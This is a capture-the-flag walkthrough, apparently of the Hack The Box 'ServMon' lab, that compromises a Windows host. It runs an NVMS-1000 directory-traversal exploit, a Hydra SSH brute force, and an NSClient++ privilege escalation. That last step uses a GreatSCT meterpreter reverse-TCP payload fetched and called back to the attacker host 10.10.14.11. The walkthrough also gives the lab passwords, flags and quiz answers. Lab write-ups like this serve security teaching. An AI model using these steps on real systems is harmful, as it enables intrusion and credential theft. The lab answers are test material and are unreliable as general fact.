Initial Scan with Nmap
We begin by running an nmap scan against the target machine to identify open ports and services:
nmap -sC -sV -Pn -v 10.129.232.55PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_02-28-22 07:35PM <DIR> Users
22/tcp open ssh OpenSSH for_Windows_8.0 (protocol 2.0)
| ssh-hostkey:
| 3072 c7:1a:f6:81:ca:17:78:d0:27:db:cd:46:2a:09:2b:54 (RSA)
| 256 3e:63:ef:3b:6e:3e:4a:90:f3:4c:02:e9:40:67:2e:42 (ECDSA)
|_ 256 5a:48:c8:cd:39:78:21:29:ef:fb:ae:82:1d:03:ad:af (ED25519)
80/tcp open http
|_http-favicon: Unknown favicon MD5: 3AEF8B29C4866F96A539730FAB53A88F
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Site doesn't have a title (text/html).
| fingerprint-strings:
| GetRequest, HTTPOptions, RTSPRequest:
| HTTP/1.1 200 OK
| Content-type: text/html
| Content-Length: 340
| Connection: close
| AuthInfo:
| <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
| <html xmlns="http://www.w3.org/1999/xhtml">
| <head>
| <title></title>
| <script type="text/javascript">
| window.location.href = "Pages/login.htm";
| </script>
| </head>
| <body>
| </body>
| </html>
| NULL:
| HTTP/1.1 408 Request Timeout
| Content-type: text/html
| Content-Length: 0
| Connection: close
|_ AuthInfo:
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
5666/tcp open tcpwrapped
6699/tcp open napster?
8443/tcp open ssl/https-alt
| http-methods:
|_ Supported Methods: GET
| ssl-cert: Subject: commonName=localhost
| Issuer: commonName=localhost
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2020-01-14T13:24:20
| Not valid after: 2021-01-13T13:24:20
| MD5: 1d03:0c40:5b7a:0f6d:d8c8:78e3:cba7:38b4
|_SHA-1: 7083:bd82:b4b0:f9c0:cc9c:5019:2f9f:9291:4694:8334
| http-title: NSClient++
|_Requested resource was /index.html
|_ssl-date: TLS randomness does not represent time
| fingerprint-strings:
| FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions:
| HTTP/1.1 404
| Content-Length: 18
| Document not found
| GetRequest:
| HTTP/1.1 302
| Content-Length: 0
| Location: /index.html
| @+hb
| workers
|_ jobs
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port80-TCP:V=7.94SVN%I=7%D=10/27%Time=671EFECA%P=x86_64-pc-linux-gnu%r(
SF:NULL,6B,"HTTP/1\.1\x20408\x20Request\x20Timeout\r\nContent-type:\x20tex
SF:t/html\r\nContent-Length:\x200\r\nConnection:\x20close\r\nAuthInfo:\x20
SF:\r\n\r\n")%r(GetRequest,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x2
SF:0text/html\r\nContent-Length:\x20340\r\nConnection:\x20close\r\nAuthInf
SF:o:\x20\r\n\r\n\xef\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\
SF:x20XHTML\x201\.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtm
SF:l1/DTD/xhtml1-transitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.
SF:w3\.org/1999/xhtml\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\
SF:x20\x20\x20\x20<script\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20
SF:\x20\x20\x20\x20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\
SF:n\x20\x20\x20\x20</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r
SF:\n")%r(HTTPOptions,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text
SF:/html\r\nContent-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x2
SF:0\r\n\r\n\xef\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20XH
SF:TML\x201\.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/DT
SF:D/xhtml1-transitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.o
SF:rg/1999/xhtml\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\x
SF:20\x20\x20<script\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20\
SF:x20\x20\x20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20
SF:\x20\x20\x20</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n")%
SF:r(RTSPRequest,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text/html
SF:\r\nContent-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n
SF:\r\n\xef\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20XHTML\x
SF:201\.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/DTD/xht
SF:ml1-transitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.org/19
SF:99/xhtml\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\x20\x2
SF:0\x20<script\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20\x20\x
SF:20\x20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20\x20\
SF:x20\x20</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port8443-TCP:V=7.94SVN%T=SSL%I=7%D=10/27%Time=671EFED2%P=x86_64-pc-linu
SF:x-gnu%r(GetRequest,74,"HTTP/1\.1\x20302\r\nContent-Length:\x200\r\nLoca
SF:tion:\x20/index\.html\r\n\r\n\0\0\0\0\0\0\0\0\0\0\x8f\x01\0\0\0\+hb\x8f
SF:\x01\0\0@\+hb\x8f\x01\0\x12\x02\x18\0\x1aC\n\x07workers\x12\n\n\x04jobs
SF:\x12\x02\x18\x20\x12\x0f")%r(HTTPOptions,36,"HTTP/1\.1\x20404\r\nConten
SF:t-Length:\x2018\r\n\r\nDocument\x20not\x20found")%r(FourOhFourRequest,3
SF:6,"HTTP/1\.1\x20404\r\nContent-Length:\x2018\r\n\r\nDocument\x20not\x20
SF:found")%r(RTSPRequest,36,"HTTP/1\.1\x20404\r\nContent-Length:\x2018\r\n
SF:\r\nDocument\x20not\x20found")%r(SIPOptions,36,"HTTP/1\.1\x20404\r\nCon
SF:tent-Length:\x2018\r\n\r\nDocument\x20not\x20found");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2024-10-28T03:04:28
|_ start_date: N/A
|_clock-skew: -5s
This reveals several open ports, including:
- Port 21: FTP (Microsoft FTP service)
- Anonymous login enabled
- Port 22: SSH (OpenSSH for Windows 8.0)
- Port 80: HTTP
- Port 8443: SSL (NSClient++)
From the scan results, we learn that anonymous FTP access is allowed, and there is an HTTP server with a redirect to a login page.
What service runs on port 21? FTP
Is anonymous authentication enabled on the FTP service? Yes
Connecting to FTP
Using the anonymous credentials, we connect to the FTP service:
ftp 10.129.232.55
Name: anonymous
Password: (press Enter)We navigate to the Nadine directory and download Confidential.txt, which contains a message indicating the presence of Passwords.txt on Nathan's desktop.
└─$ ftp 10.129.232.55
Connected to 10.129.232.55
220 Microsoft FTP Service
Name (10.129.232.55:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||49684|)
125 Data connection already open; Transfer starting.
02-28-22 07:35PM <DIR> Users
226 Transfer complete.
ftp> cd Users
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||49685|)
125 Data connection already open; Transfer starting.
02-28-22 07:36PM <DIR> Nadine
02-28-22 07:37PM <DIR> Nathan
226 Transfer complete.
ftp> cd Nadine
ls
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||49686|)
150 Opening ASCII mode data connection.
02-28-22 07:36PM 168 Confidential.txt
226 Transfer complete.
ftp> get Confidential.txt
local: Confidential.txt remote: Confidential.txt
229 Entering Extended Passive Mode (|||49687|)
125 Data connection already open; Transfer starting.
100% |***********************************************************************| 168 1.33 KiB/s 00:00 ETA
226 Transfer complete.
WARNING! 6 bare linefeeds received in ASCII mode.
File may not have transferred correctly.
168 bytes received in 00:00 (1.32 KiB/s)
ftp> ls
229 Entering Extended Passive Mode (|||50838|)
125 Data connection already open; Transfer starting.
02-28-22 07:36PM 182 Notes to do.txt
226 Transfer complete.
ftp> get Notes to do.txt
Upon opening Confidential.txt, we discover:
└─$ cat Confidential.txt
Nathan,
I left your Passwords.txt file on your Desktop. Please remove this once you have edited it yourself and place it back into the secure folder.
Regards
Nadine Upon opening Notes to do.txt, we discover:
└─$ cat Notes\ to\ do.txt
1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint What is the full name of the sensitive file present on Nathans's Desktop? Passwords.txt
Exploring the HTTP Service
Navigating to http://10.129.227.77, we find a webpage for NVMS-1000, a network video surveillance application. After some research, we find that CVE-2019-20085 affects this software, allowing arbitrary file read.
We download the exploit from https://github.com/AleDiBen/NVMS1000-Exploit/blob/master/nvms.py
Using the exploit, we retrieve Passwords.txt from Nathan's desktop, which provides several potential passwords.
└─$ python nvms.py 10.129.227.77 Users/Nathan/Desktop/Passwords.txt Passwords.txt
[+] DT Attack Succeeded
[+] Saving File Content
[+] Saved
[+] File Content
++++++++++ BEGIN ++++++++++
1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$
++++++++++ END ++++++++++
Brute Force SSH Login
Using Hydra, we brute-force the SSH login for Nadine with the passwords obtained from Passwords.txt:
└─$ hydra -L users.txt -P passwords.txt 10.129.227.77 ssh
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-10-27 23:43:33
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 14 tasks per 1 server, overall 14 tasks, 14 login tries (l:2/p:7), ~1 try per task
[DATA] attacking ssh://10.129.227.77:22/
[22][ssh] host: 10.129.227.77 login: Nadine password: L1k3B1gBut7s@W0rk
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-10-27 23:43:37
The valid credentials are found to be:
- Username: Nadine
- Password: L1k3B1gBut7s@W0rk
What is the valid password to authenticate over SSH on TCP port 22? L1k3B1gBut7s@W0rk
SSH Access and User Flag
We SSH into the machine using Nadine's credentials:
ssh Nadine@10.129.232.55After logging in, we navigate to Nadine's desktop and retrieve the user.txt flag.
nadine@SERVMON C:\Users\Nadine>dir
Volume in drive C has no label.
Volume Serial Number is 20C1-47A1
Directory of C:\Users\Nadine
02/28/2022 08:04 PM <DIR> .
02/28/2022 08:04 PM <DIR> ..
02/28/2022 08:04 PM <DIR> 3D Objects
02/28/2022 08:04 PM <DIR> Contacts
02/28/2022 08:05 PM <DIR> Desktop
02/28/2022 08:04 PM <DIR> Documents
02/28/2022 08:04 PM <DIR> Downloads
02/28/2022 08:04 PM <DIR> Favorites
02/28/2022 08:04 PM <DIR> Links
02/28/2022 08:04 PM <DIR> Music
02/28/2022 08:04 PM <DIR> Pictures
02/28/2022 08:04 PM <DIR> Saved Games
02/28/2022 08:04 PM <DIR> Searches
02/28/2022 08:04 PM <DIR> Videos
0 File(s) 0 bytes
14 Dir(s) 6,128,906,240 bytes free
nadine@SERVMON C:\Users\Nadine>cd Desktop
nadine@SERVMON C:\Users\Nadine\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 20C1-47A1
Directory of C:\Users\Nadine\Desktop
02/28/2022 08:05 PM <DIR> .
02/28/2022 08:05 PM <DIR> ..
10/27/2024 07:59 PM 34 user.txt
1 File(s) 34 bytes
2 Dir(s) 6,128,906,240 bytes free
nadine@SERVMON C:\Users\Nadine\Desktop>type user.txt
d291702c4a1ab9dc8630b211a128be17Investigating Installed Software
Checking the installed applications, we notice NSClient++ is installed.
nadine@SERVMON C:\>cd "Program Files"
nadine@SERVMON C:\Program Files>dir
Volume in drive C has no label.
Volume Serial Number is 20C1-47A1
Directory of C:\Program Files
02/28/2022 07:55 PM <DIR> .
02/28/2022 07:55 PM <DIR> ..
03/01/2022 02:20 AM <DIR> Common Files
11/11/2019 07:52 PM <DIR> internet explorer
02/28/2022 07:07 PM <DIR> MSBuild
02/28/2022 07:55 PM <DIR> NSClient++
02/28/2022 07:46 PM <DIR> NVMS-1000
02/28/2022 07:32 PM <DIR> OpenSSH-Win64
02/28/2022 07:07 PM <DIR> Reference Assemblies
02/28/2022 06:44 PM <DIR> VMware
11/11/2019 07:52 PM <DIR> Windows Defender
11/11/2019 07:52 PM <DIR> Windows Defender Advanced Threat Protection
09/15/2018 12:19 AM <DIR> Windows Mail
11/11/2019 07:52 PM <DIR> Windows Media Player
09/15/2018 12:19 AM <DIR> Windows Multimedia Platform
09/15/2018 12:28 AM <DIR> windows nt
11/11/2019 07:52 PM <DIR> Windows Photo Viewer
09/15/2018 12:19 AM <DIR> Windows Portable Devices
09/15/2018 12:19 AM <DIR> Windows Security
02/28/2022 07:25 PM <DIR> WindowsPowerShell
0 File(s) 0 bytes
20 Dir(s) 6,128,881,664 bytes free
There's an unusual third part application on the system. What's the name of a very this software? NSClient++
We inspect the nsclient.ini configuration file and find the following line:
nadine@SERVMON C:\Program Files\NSClient++>type nsclient.ini
# If you want to fill this file with all available options run the following command:
# nscp settings --generate --add-defaults --load-all
# If you want to activate a module and bring in all its options use:
# nscp settings --activate-module <MODULE NAME> --add-defaults
# For details run: nscp settings --help
; in flight - TODO
[/settings/default]
; Undocumented key
password = ew2x6SsGTxjRwXOTExploitation
Let's set up an SSH tunnel to access the web app from localhost port 8443
ssh -L 8443:127.0.0.1:8443 nadine@10.129.232.55Navigate to https://localhost:8443 and use the password found in the ini file to login. Let's create an external script that will execute our payload on the system.
Navigate to Settings > External Scripts > Scripts and click + Add new .
Next, input /settings/external scripts/scripts/shellz in the Section field, the command in
the Key field, and C:\Users\Nadine\Documents\pwn.bat in Value . The bat file will be used to run commands as system.
Save the script and click on Changes , and then Save Configuration. Select Control > Reload
In order to get a shell, let's create a meterpreter payload with GreatSCT. Run setup.sh first.
cd ~/Servmon
git clone https://github.com/GreatSCT/GreatSCT
cd GreatSCT
sudo ./GreatSCT.py --ip 10.10.14.11 --port 1234 -t bypass -p
regsvcs/meterpreter/rev_tcp.py -o serv===============================================================================
Great Scott!
===============================================================================
[Web]: https://github.com/GreatSCT/GreatSCT | [Twitter]: @ConsciousHacker
===============================================================================
[*] Language: regsvcs
[*] Payload Module: regsvcs/meterpreter/rev_tcp
[*] DLL written to: /usr/share/greatsct-output/compiled/serv.dll
[*] Source code written to: /usr/share/greatsct-output/source/serv.cs
[*] Execute with: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe serv.dll
[*] Metasploit RC file written to: /usr/share/greatsct-output/handlers/serv.rc
Start a Python3 HTTP Server to download the DLL
cd /usr/share/greatsct-output/compiled/
sudo python3 -m http.server 80Download the DLL from the server using PowerShell.
wget http://10.10.14.11/serv.dll -o C:\Users\Nadine\Documents\serv.dllLet's echo our payload on the box to create pwn.bat.
Nadine@SERVMON C:\Users\Nadine>cmd /c "echo C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe C:\Users\Nadine\Documents\serv.dll > C:\Users\Nadine\Documents\pwn.bat"Open msfconsole and specify the generated RCE file.
msfconsole -r /usr/share/greatsct-output/handlers/serv.rcNext, navigate to the console on http://127.0.0.1/8443, input the script name shellz and click Run. Alternatively, select Control > Reload.
A connection is received. Sometimes the first connection dies. In that case run the command again, and a second connection will be received that is stable.
msf6 exploit(multi/handler) >
[*] Sending stage (176198 bytes) to 10.129.232.55
[*] Sending stage (176198 bytes) to 10.129.232.55
[*] Sending stage (176198 bytes) to 10.129.232.55
[*] Meterpreter session 4 opened (10.10.14.11:1234 -> 10.129.232.55:50823) at 2024-10-28 02:03:09 -0400
[*] Meterpreter session 6 opened (10.10.14.11:1234 -> 10.129.232.55:50830) at 2024-10-28 02:03:12 -0400
[*] Sending stage (176198 bytes) to 10.129.232.55
[*] Meterpreter session 7 opened (10.10.14.11:1234 -> 10.129.232.55:50833) at 2024-10-28 02:03:30 -0400
[*] Meterpreter session 5 opened (10.10.14.11:1234 -> 10.129.232.55:50828) at 2024-10-28 02:03:33 -0400
msf6 exploit(multi/handler) > sessions -l
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
4 meterpreter x86/windows NT AUTHORITY\SYSTEM @ SERVMON 10.10.14.11:1234 -> 10.129.232.55:50823 (10.129.232.55)
5 meterpreter x86/windows NT AUTHORITY\SYSTEM @ SERVMON 10.10.14.11:1234 -> 10.129.232.55:50828 (10.129.232.55)
6 meterpreter x86/windows NT AUTHORITY\SYSTEM @ SERVMON 10.10.14.11:1234 -> 10.129.232.55:50830 (10.129.232.55)
7 meterpreter x86/windows NT AUTHORITY\SYSTEM @ SERVMON 10.10.14.11:1234 -> 10.129.232.55:50833 (10.129.232.55)
msf6 exploit(multi/handler) > sessions -i 5
[*] Starting interaction with 5...
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
The root flag is located in C:\Users\Administrator\Desktop
meterpreter > ls
Listing: C:\Users\Administrator\Desktop
=======================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 282 fil 2022-03-01 04:18:46 -0500 desktop.ini
100444/r--r--r-- 34 fil 2024-10-28 01:08:08 -0400 root.txt
meterpreter > cat root.txt
c4d110ea97852167eabb5e3d7290bca7
We have found a non-default application, we know the version installed and we can access it as an authenticated user. Searching for vulnerabilities affecting this environment reveals a Local Privilege Escalation vulnerability. As what user we get code execution after successfully exploiting this vulnerability? NT AUTHORITY\SYSTEM
References
- HTB Servmon Official Walkthrough